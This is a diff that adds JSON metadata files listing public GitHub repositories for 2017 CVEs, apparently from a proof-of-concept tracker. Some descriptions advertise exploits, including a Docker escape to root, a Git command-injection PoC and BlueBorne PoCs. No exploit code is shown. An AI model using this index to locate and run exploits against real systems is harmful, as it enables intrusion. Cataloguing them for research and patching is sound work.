end of file diff --git a/2017/CVE-2017-1000000.json b/2017/CVE-2017-1000000.json new file mode 100644 index 0000000000..96b010feb1 --- /dev/null +++ b/2017/CVE-2017-1000000.json @@ -0,0 +1,33 @@ +[ + { + "id": 91563154, + "name": "DWF-CVE-2017-1000000", + "full_name": "smythtech\/DWF-CVE-2017-1000000", + "owner": { + "login": "smythtech", + "id": 9844564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9844564?v=4", + "html_url": "https:\/\/github.com\/smythtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smythtech\/DWF-CVE-2017-1000000", + "description": null, + "fork": false, + "created_at": "2017-05-17T10:14:54Z", + "updated_at": "2017-07-06T21:23:57Z", + "pushed_at": "2017-05-17T10:27:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000028.json b/2017/CVE-2017-1000028.json new file mode 100644 index 0000000000..8c5ff462cd --- /dev/null +++ b/2017/CVE-2017-1000028.json @@ -0,0 +1,33 @@ +[ + { + "id": 728555573, + "name": "CVE-2017-1000028", + "full_name": "NeonNOXX\/CVE-2017-1000028", + "owner": { + "login": "NeonNOXX", + "id": 89446802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89446802?v=4", + "html_url": "https:\/\/github.com\/NeonNOXX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeonNOXX\/CVE-2017-1000028", + "description": "POC&EXP for GlassFish<4.1.1(not including 4.1.1).", + "fork": false, + "created_at": "2023-12-07T07:35:39Z", + "updated_at": "2024-05-16T16:52:48Z", + "pushed_at": "2023-12-07T07:52:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000083.json b/2017/CVE-2017-1000083.json new file mode 100644 index 0000000000..80304469f4 --- /dev/null +++ b/2017/CVE-2017-1000083.json @@ -0,0 +1,64 @@ +[ + { + "id": 155380204, + "name": "evince-cve-2017-1000083", + "full_name": "matlink\/evince-cve-2017-1000083", + "owner": { + "login": "matlink", + "id": 4450078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4450078?v=4", + "html_url": "https:\/\/github.com\/matlink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matlink\/evince-cve-2017-1000083", + "description": null, + "fork": false, + "created_at": "2018-10-30T12:18:11Z", + "updated_at": "2018-11-15T16:16:21Z", + "pushed_at": "2018-11-15T16:16:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 155380798, + "name": "cve-2017-1000083-atril-nautilus", + "full_name": "matlink\/cve-2017-1000083-atril-nautilus", + "owner": { + "login": "matlink", + "id": 4450078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4450078?v=4", + "html_url": "https:\/\/github.com\/matlink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matlink\/cve-2017-1000083-atril-nautilus", + "description": null, + "fork": false, + "created_at": "2018-10-30T12:22:41Z", + "updated_at": "2018-10-30T12:24:39Z", + "pushed_at": "2018-10-30T12:24:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000112.json b/2017/CVE-2017-1000112.json new file mode 100644 index 0000000000..a44951a61b --- /dev/null +++ b/2017/CVE-2017-1000112.json @@ -0,0 +1,95 @@ +[ + { + "id": 208989601, + "name": "docker_escape_pwn", + "full_name": "hikame\/docker_escape_pwn", + "owner": { + "login": "hikame", + "id": 6397196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6397196?v=4", + "html_url": "https:\/\/github.com\/hikame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hikame\/docker_escape_pwn", + "description": "Escape from Docker using CVE-2017-1000112 and CVE-2017-18344, including gaining root privilage, get all capbilities, namespace recovery, filesystem recovery, cgroup limitation bypass and seccomp bypass.", + "fork": false, + "created_at": "2019-09-17T07:38:47Z", + "updated_at": "2019-09-29T10:14:51Z", + "pushed_at": "2019-09-29T10:14:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 240509756, + "name": "CVE-2017-1000112-Adpated", + "full_name": "ol0273st-s\/CVE-2017-1000112-Adpated", + "owner": { + "login": "ol0273st-s", + "id": 48091319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48091319?v=4", + "html_url": "https:\/\/github.com\/ol0273st-s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ol0273st-s\/CVE-2017-1000112-Adpated", + "description": "POE code for CVE-2017-1000112 adapted to both funtion on a specific VM and Escape a Docker", + "fork": false, + "created_at": "2020-02-14T13:03:00Z", + "updated_at": "2021-02-24T16:29:23Z", + "pushed_at": "2020-02-14T13:03:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263400319, + "name": "SNP-Assignment", + "full_name": "IT19083124\/SNP-Assignment", + "owner": { + "login": "IT19083124", + "id": 65245870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65245870?v=4", + "html_url": "https:\/\/github.com\/IT19083124", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IT19083124\/SNP-Assignment", + "description": "Exploit work Privilege Escalation CVE-2017-1000112", + "fork": false, + "created_at": "2020-05-12T17:07:11Z", + "updated_at": "2021-08-28T11:09:46Z", + "pushed_at": "2020-05-12T17:09:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000117.json b/2017/CVE-2017-1000117.json new file mode 100644 index 0000000000..6197c8cf75 --- /dev/null +++ b/2017/CVE-2017-1000117.json @@ -0,0 +1,684 @@ +[ + { + "id": 100002532, + "name": "CVE-2017-1000117", + "full_name": "timwr\/CVE-2017-1000117", + "owner": { + "login": "timwr", + "id": 684924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timwr\/CVE-2017-1000117", + "description": "Proof of concept of CVE-2017-1000117", + "fork": false, + "created_at": "2017-08-11T07:03:23Z", + "updated_at": "2024-08-12T19:31:55Z", + "pushed_at": "2017-08-11T08:27:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100069051, + "name": "CVE-2017-1000117", + "full_name": "Manouchehri\/CVE-2017-1000117", + "owner": { + "login": "Manouchehri", + "id": 7232674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7232674?v=4", + "html_url": "https:\/\/github.com\/Manouchehri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Manouchehri\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-11T20:47:53Z", + "updated_at": "2018-04-19T04:23:54Z", + "pushed_at": "2017-08-11T21:26:33Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 100080640, + "name": "CVE-2017-1000117", + "full_name": "thelastbyte\/CVE-2017-1000117", + "owner": { + "login": "thelastbyte", + "id": 7829097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7829097?v=4", + "html_url": "https:\/\/github.com\/thelastbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thelastbyte\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-12T01:10:49Z", + "updated_at": "2017-09-01T22:06:02Z", + "pushed_at": "2017-09-01T22:08:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100116587, + "name": "CVE-2017-1000117", + "full_name": "alilangtest\/CVE-2017-1000117", + "owner": { + "login": "alilangtest", + "id": 20162983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20162983?v=4", + "html_url": "https:\/\/github.com\/alilangtest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alilangtest\/CVE-2017-1000117", + "description": "test", + "fork": false, + "created_at": "2017-08-12T14:14:55Z", + "updated_at": "2019-05-09T09:27:01Z", + "pushed_at": "2017-08-12T14:25:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100130122, + "name": "CVE-2017-1000117", + "full_name": "VulApps\/CVE-2017-1000117", + "owner": { + "login": "VulApps", + "id": 29811930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29811930?v=4", + "html_url": "https:\/\/github.com\/VulApps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VulApps\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-12T18:20:02Z", + "updated_at": "2024-08-12T19:31:56Z", + "pushed_at": "2017-08-12T18:22:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100280254, + "name": "CVE-2017-1000117", + "full_name": "greymd\/CVE-2017-1000117", + "owner": { + "login": "greymd", + "id": 3874767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3874767?v=4", + "html_url": "https:\/\/github.com\/greymd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greymd\/CVE-2017-1000117", + "description": "Check Git's vulnerability CVE-2017-1000117", + "fork": false, + "created_at": "2017-08-14T15:05:48Z", + "updated_at": "2023-01-31T00:27:48Z", + "pushed_at": "2017-08-16T15:39:15Z", + "stargazers_count": 136, + "watchers_count": 136, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 136, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 100325886, + "name": "Fix-CVE-2017-1000117", + "full_name": "shogo82148\/Fix-CVE-2017-1000117", + "owner": { + "login": "shogo82148", + "id": 1157344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1157344?v=4", + "html_url": "https:\/\/github.com\/shogo82148", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shogo82148\/Fix-CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-15T01:40:18Z", + "updated_at": "2017-08-17T03:44:20Z", + "pushed_at": "2017-08-17T03:44:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 100357293, + "name": "CVE-2017-1000117_wasawasa", + "full_name": "sasairc\/CVE-2017-1000117_wasawasa", + "owner": { + "login": "sasairc", + "id": 9349287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9349287?v=4", + "html_url": "https:\/\/github.com\/sasairc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sasairc\/CVE-2017-1000117_wasawasa", + "description": null, + "fork": false, + "created_at": "2017-08-15T08:39:23Z", + "updated_at": "2017-08-15T09:39:16Z", + "pushed_at": "2017-08-15T08:43:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100374790, + "name": "CVE-2017-1000117-test", + "full_name": "Shadow5523\/CVE-2017-1000117-test", + "owner": { + "login": "Shadow5523", + "id": 22784789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22784789?v=4", + "html_url": "https:\/\/github.com\/Shadow5523", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadow5523\/CVE-2017-1000117-test", + "description": "CVE-2017-1000117の検証", + "fork": false, + "created_at": "2017-08-15T12:24:57Z", + "updated_at": "2017-08-17T14:54:39Z", + "pushed_at": "2017-08-18T02:18:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 100437171, + "name": "CVE-2017-1000117", + "full_name": "ieee0824\/CVE-2017-1000117", + "owner": { + "login": "ieee0824", + "id": 5692475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5692475?v=4", + "html_url": "https:\/\/github.com\/ieee0824", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ieee0824\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-16T02:05:08Z", + "updated_at": "2023-10-14T21:55:03Z", + "pushed_at": "2017-08-16T10:03:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100445561, + "name": "CVE-2017-1000117", + "full_name": "rootclay\/CVE-2017-1000117", + "owner": { + "login": "rootclay", + "id": 29671471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29671471?v=4", + "html_url": "https:\/\/github.com\/rootclay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rootclay\/CVE-2017-1000117", + "description": "CVE-2017-1000117", + "fork": false, + "created_at": "2017-08-16T03:52:27Z", + "updated_at": "2017-08-16T04:00:53Z", + "pushed_at": "2017-08-16T06:14:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100446125, + "name": "CVE-2017-1000117-sl", + "full_name": "ieee0824\/CVE-2017-1000117-sl", + "owner": { + "login": "ieee0824", + "id": 5692475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5692475?v=4", + "html_url": "https:\/\/github.com\/ieee0824", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ieee0824\/CVE-2017-1000117-sl", + "description": "Experiment of CVE-2017-1000117", + "fork": false, + "created_at": "2017-08-16T04:01:08Z", + "updated_at": "2017-08-16T05:42:26Z", + "pushed_at": "2017-08-16T09:54:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100498924, + "name": "CVE-2017-1000117", + "full_name": "takehaya\/CVE-2017-1000117", + "owner": { + "login": "takehaya", + "id": 10973623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10973623?v=4", + "html_url": "https:\/\/github.com\/takehaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takehaya\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-16T14:34:37Z", + "updated_at": "2017-08-16T14:34:37Z", + "pushed_at": "2017-08-17T18:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 100544749, + "name": "CVE-2017-1000117", + "full_name": "ikmski\/CVE-2017-1000117", + "owner": { + "login": "ikmski", + "id": 6622579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6622579?v=4", + "html_url": "https:\/\/github.com\/ikmski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ikmski\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-08-17T00:37:47Z", + "updated_at": "2017-08-17T00:37:47Z", + "pushed_at": "2017-08-17T00:57:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 100730507, + "name": "CVE-2017-1000117", + "full_name": "nkoneko\/CVE-2017-1000117", + "owner": { + "login": "nkoneko", + "id": 1922341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1922341?v=4", + "html_url": "https:\/\/github.com\/nkoneko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nkoneko\/CVE-2017-1000117", + "description": "GitのCommand Injectionの脆弱性を利用してスクリプトを落として実行する例", + "fork": false, + "created_at": "2017-08-18T16:23:53Z", + "updated_at": "2021-10-29T02:55:04Z", + "pushed_at": "2021-10-29T02:55:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 100926724, + "name": "test", + "full_name": "chenzhuo0618\/test", + "owner": { + "login": "chenzhuo0618", + "id": 5562130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5562130?v=4", + "html_url": "https:\/\/github.com\/chenzhuo0618", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenzhuo0618\/test", + "description": "test for CVE-2017-1000117", + "fork": false, + "created_at": "2017-08-21T07:46:16Z", + "updated_at": "2017-08-21T07:46:48Z", + "pushed_at": "2017-08-21T08:51:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 102318198, + "name": "CVE-2017-1000117", + "full_name": "siling2017\/CVE-2017-1000117", + "owner": { + "login": "siling2017", + "id": 27729343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27729343?v=4", + "html_url": "https:\/\/github.com\/siling2017", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/siling2017\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-09-04T04:18:19Z", + "updated_at": "2017-09-04T04:18:29Z", + "pushed_at": "2017-09-04T04:18:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 112913757, + "name": "CVE-2017-1000117", + "full_name": "Q2h1Cg\/CVE-2017-1000117", + "owner": { + "login": "Q2h1Cg", + "id": 3953030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3953030?v=4", + "html_url": "https:\/\/github.com\/Q2h1Cg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Q2h1Cg\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2017-12-03T08:58:18Z", + "updated_at": "2017-12-03T08:58:33Z", + "pushed_at": "2017-12-03T08:59:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 166267328, + "name": "cve-2017-1000117", + "full_name": "cved-sources\/cve-2017-1000117", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-1000117", + "description": "cve-2017-1000117", + "fork": false, + "created_at": "2019-01-17T17:28:01Z", + "updated_at": "2021-04-15T21:21:51Z", + "pushed_at": "2021-04-15T21:21:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 187589348, + "name": "CVE-2017-1000117", + "full_name": "leezp\/CVE-2017-1000117", + "owner": { + "login": "leezp", + "id": 16287528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16287528?v=4", + "html_url": "https:\/\/github.com\/leezp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leezp\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2019-05-20T07:25:58Z", + "updated_at": "2023-10-14T21:55:51Z", + "pushed_at": "2019-05-20T07:55:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 192838091, + "name": "CVE-2017-1000117", + "full_name": "AnonymKing\/CVE-2017-1000117", + "owner": { + "login": "AnonymKing", + "id": 26847177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26847177?v=4", + "html_url": "https:\/\/github.com\/AnonymKing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnonymKing\/CVE-2017-1000117", + "description": "CVE-2017-1000117漏洞复现(PoC+Exp)", + "fork": false, + "created_at": "2019-06-20T02:55:19Z", + "updated_at": "2023-10-14T21:46:20Z", + "pushed_at": "2019-06-21T11:44:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 394896297, + "name": "CVE-2017-1000117", + "full_name": "Jerry-zhuang\/CVE-2017-1000117", + "owner": { + "login": "Jerry-zhuang", + "id": 60707341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60707341?v=4", + "html_url": "https:\/\/github.com\/Jerry-zhuang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jerry-zhuang\/CVE-2017-1000117", + "description": null, + "fork": false, + "created_at": "2021-08-11T07:09:26Z", + "updated_at": "2021-08-11T08:12:22Z", + "pushed_at": "2021-08-11T08:12:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000170.json b/2017/CVE-2017-1000170.json new file mode 100644 index 0000000000..e2502916ff --- /dev/null +++ b/2017/CVE-2017-1000170.json @@ -0,0 +1,33 @@ +[ + { + "id": 349418378, + "name": "Jquery-File-Tree-1.6.6-Path-Traversal", + "full_name": "Nickguitar\/Jquery-File-Tree-1.6.6-Path-Traversal", + "owner": { + "login": "Nickguitar", + "id": 3837916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4", + "html_url": "https:\/\/github.com\/Nickguitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nickguitar\/Jquery-File-Tree-1.6.6-Path-Traversal", + "description": "Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)", + "fork": false, + "created_at": "2021-03-19T12:39:10Z", + "updated_at": "2023-12-30T03:34:28Z", + "pushed_at": "2021-05-04T18:21:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000250.json b/2017/CVE-2017-1000250.json new file mode 100644 index 0000000000..c83ed382ca --- /dev/null +++ b/2017/CVE-2017-1000250.json @@ -0,0 +1,33 @@ +[ + { + "id": 110457097, + "name": "CVE-2017-1000250-PoC", + "full_name": "olav-st\/CVE-2017-1000250-PoC", + "owner": { + "login": "olav-st", + "id": 1856634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1856634?v=4", + "html_url": "https:\/\/github.com\/olav-st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olav-st\/CVE-2017-1000250-PoC", + "description": "Proof of concept exploit script for CVE-2017-1000250. Written while researching for the essay in TTM4137 Wireless Security.", + "fork": false, + "created_at": "2017-11-12T18:18:52Z", + "updated_at": "2019-03-20T07:23:31Z", + "pushed_at": "2017-11-12T19:46:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000251.json b/2017/CVE-2017-1000251.json new file mode 100644 index 0000000000..c5dc1455bf --- /dev/null +++ b/2017/CVE-2017-1000251.json @@ -0,0 +1,162 @@ +[ + { + "id": 104546702, + "name": "Blueborne-CVE-2017-1000251", + "full_name": "hayzamjs\/Blueborne-CVE-2017-1000251", + "owner": { + "login": "hayzamjs", + "id": 3922884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3922884?v=4", + "html_url": "https:\/\/github.com\/hayzamjs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hayzamjs\/Blueborne-CVE-2017-1000251", + "description": "Blueborne CVE-2017-1000251 PoC for linux machines", + "fork": false, + "created_at": "2017-09-23T06:29:31Z", + "updated_at": "2024-09-18T09:52:32Z", + "pushed_at": "2023-03-10T03:04:17Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueborne", + "bluetooth", + "linux", + "poc" + ], + "visibility": "public", + "forks": 14, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 105091487, + "name": "blueborne-CVE-2017-1000251", + "full_name": "tlatkdgus1\/blueborne-CVE-2017-1000251", + "owner": { + "login": "tlatkdgus1", + "id": 13446909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13446909?v=4", + "html_url": "https:\/\/github.com\/tlatkdgus1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tlatkdgus1\/blueborne-CVE-2017-1000251", + "description": "clone", + "fork": false, + "created_at": "2017-09-28T02:12:57Z", + "updated_at": "2017-09-28T02:19:14Z", + "pushed_at": "2017-09-28T02:19:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 105433963, + "name": "blueborne-CVE-2017-1000251-POC", + "full_name": "own2pwn\/blueborne-CVE-2017-1000251-POC", + "owner": { + "login": "own2pwn", + "id": 7850039, + 